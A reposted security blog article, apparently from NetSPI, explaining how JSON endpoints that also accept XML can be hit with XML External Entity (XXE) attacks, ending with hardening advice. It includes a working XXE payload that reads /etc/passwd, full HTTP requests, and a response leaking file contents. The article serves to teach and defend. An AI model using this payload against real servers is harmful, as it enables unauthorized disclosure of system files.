`

[转]Playing with Content-Type – XXE on JSON Endpoints

 
阅读更多
原文地址:

Many web and mobile applications rely on web services communication for client-server interaction. Most common data formats for web services are XML, whether SOAP or RESTful, and JSON. While a web service may be programmed to use just one of them, the server may accept data formats that the developers did not anticipate. This may result in JSON endpoints being vulnerable to XML External Entity attacks (XXE), an attack that exploits weakly configured XML parser settings on the server.

XXE is a well-known attack against XML endpoints. To exploit it, external entity declarations are included in the XML payload, and the server expands the entities, potentially resulting in read access to the web server’s file system, remote file system access via UNC paths, or connections to arbitrary hosts over HTTP/HTTPS. XXE attacks rely on inline DOCTYPE definitions in the XML payload. In the following example, an external entity pointing to the /etc/passwd file on the web server is declared and the entity is included in the XML payload:

引用
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
[some xml content..]
<element>&xxe;</element>
[some xml content..]

It’s a simple and neat attack. Time to play with the Content-Type header and HTTP request payloads to see if this could be exploited against JSON endpoints as well. A sample JSON request is listed below, with the Content-Type set to application/json (with silly sample data and most HTTP headers removed):
引用

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}

If the Content-Type header is changed to application/xml instead, the client is telling the server that the POST payload is XML formatted data. But if it’s not, the server will not be able to parse it may display an error similar to the following:

引用
HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Request:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

The error indicates that the server is able to process XML formatted data as well as JSON formatted data but as the data wasn’t actually XML formatted like stated in the Content-Type header, it cannot be parsed. To overcome this, JSON has to be converted to XML. There are multiple online tools for that, and Eric Gruber created a Burp plugin to automate the conversion in Burp (Content-Type Converter).

引用
Original JSON

{"search":"name","value":"netspitest"}

XML Conversion

<?xml version="1.0" encoding="UTF-8" ?>
<search>name</search>
<value>netspitest</value>

However, this straight up conversion results in an invalid XML document as it does not have a root element that’s required in well formatted XML documents. If the invalid XML is sent to the server. sometimes the server will respond with an error message stating what kind of root element was expected, along with the namespace. Otherwise the best guess is to add root element <root> which makes the XML valid.

引用
<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>

Now the original JSON request can be sent as XML and the server may return a valid response:

引用
HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 112

<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}

As the server accepts XML input, XXE can be exploited against a JSON endpoint.

引用
HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....

Obviously, not every JSON endpoint accepts XML; changing the Content-Type header may not have any impact, or it may result in 415 Unsupported Media Type error message. But on the other hand, JSON to XML attacks are not limited to just POST payloads with JSON content. I have seen this work on JSON formatted GET and POST parameters as well. If the JSON parameter is converted and sent as XML, the server will guess what the content type is.

So, to harden a JSON endpoint, XML parsing should be disabled altogether and/or inline DOCTYPE declarations should be disabled to prevent XML external entity injections.
分享到:
评论

相关推荐

    信息安全_数据安全_AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf

    DTD(Document Type Definition)是XML文档类型的定义,它定义了XML文档的结构和语法。DTD用来声明XML文档的结构、元素、属性等,可以定义合法的元素和它们之间的关系。然而,DTD同样可以被攻击者利用来进行各种攻击...

    java8看不到源码-Apache-OFBiz-XXE:ApacheOFBiz&lt;16.11.04的XXE注入(文件泄露)漏洞利用

    XXE Apache OFBiz &lt; 16.11.04 的 XXE 注入(文件泄露)漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到: [1] [2] 此漏洞利用针对链接 1 中...

    测试资源上传-请勿删除!!!XXE

    。。。。。。。。。。。。。。。。。。。。。。。。。

    XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】

    XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...

    xml转json包与教程

    这个压缩包“xml转json包与教程”提供了相关的类库和教程,帮助开发者完成这一任务。下面将详细介绍这个过程中的关键知识点: 1. **XML解析器**:在Java中,处理XML数据通常使用DOM(Document Object Model)、SAX...

    struts2-json-plugin-2.3.8.jar

    例如,不恰当的配置可能导致JSON/XML External Entity (XXE) 或其他类型的攻击。因此,使用时务必遵循最佳实践,对敏感数据进行加密,并限制暴露的字段。 总之,`struts2-json-plugin-2.3.8.jar`是Struts2框架中...

    第五节 XXE漏洞利用 - 任意文件读取 无回显 -01

    服务器 DTD(Document Type Definition)是 XXE 漏洞利用的关键。攻击者可以使用 gedit 将 test.dtd 中的内容设置为以下文件内容: 然后,攻击者可以使用 Wireshark 抓取 HTTP 包,查看服务器的响应信息。 XXE ...

    CVE-2021-29447:WordPress-身份验证的XXE(CVE-2021-29447)

    WordPress 5.6-5.7-经过身份验证的XXE(CVE-2021-29447)使用步骤1。 运行WordPress $ make up-wp第2步。 运行Attacker Web服务器$ make up-mal第三步生成恶意的WAV文件$ make make-wav第四步。 登录WordPress并将...

    105-web漏洞挖掘之XXE漏洞1

    【XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...

    XXE - How to become a Jedi

    ### XXE漏洞详解:从入门到精通 #### XXE简介 **XXE(XML External Entity)** 漏洞是一种安全漏洞,它发生在应用程序解析 XML 数据时,未能正确过滤外部实体引用的情况。当一个恶意构造的 XML 文档被传入到易受...

    XML schema 编辑工具 xxe-perso-4_9_1

    "xxe-perso-4_9_1"看起来是一款专门针对XML Schema编辑的工具,版本号为4.9.1。这类工具通常提供以下功能: 1. **XML Schema设计**:用户可以通过图形界面设计复杂的XML Schema,定义元素、属性、数据类型、约束等...

    json开发过程中需要的一些jar

    5. 安全性:一些库如Jackson提供了安全模式,防止恶意JSON数据导致的安全问题,如XXE(XML External Entity)攻击。 三、使用示例 1. Jackson使用示例: ```java // 导入必要的包 import ...

    DoraBox 漏洞练习平台WriteUP.pdf

    DoraBox 漏洞练习平台 WriteUP与总结。SQLi 数字型,数字型注入拼接语句一般为 select * from &lt;表名&gt; where id = x x=x' ,程序报错。 x=x and 1=1 时,语句逻辑为真,返回正常结果。 x=x and 1=2 时,语句逻辑为...

    信息安全_xxe注入应用与拓展.pptx

    3. **开发框架的Content-Type智能识别**:例如SpringMVC框架,当接收到XML内容并使用JAXB进行反序列化时,如果没有正确的安全设置,可能会导致XXE漏洞。 4. **使用SAML的登录接口**:SAML协议用于身份验证和授权数据...

    WebGoat8-xxe注入漏洞分析

    XXE 注入漏洞分析 在 Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 ...

    第39天:WEB漏洞-XXE&XML之利用检测绕过全解1

    【XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...

    web安全综合实战六flag-XXE.docx

    web安全综合实战六flag-XXE.docx

    XXE - 防御策略-01

    XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...

    web渗透系列教学下载共64份.zip

    web渗透--31--Json劫持Json注入.pdf web渗透--32--宽字节注入.pdf web渗透--33--脆弱的通信加密算法.pdf web渗透--34--Padding Oracle攻击.pdf web渗透--35--未加密信道发送敏感数据.pdf web渗透--36--业务逻辑数据...

Global site tag (gtag.js) - Google Analytics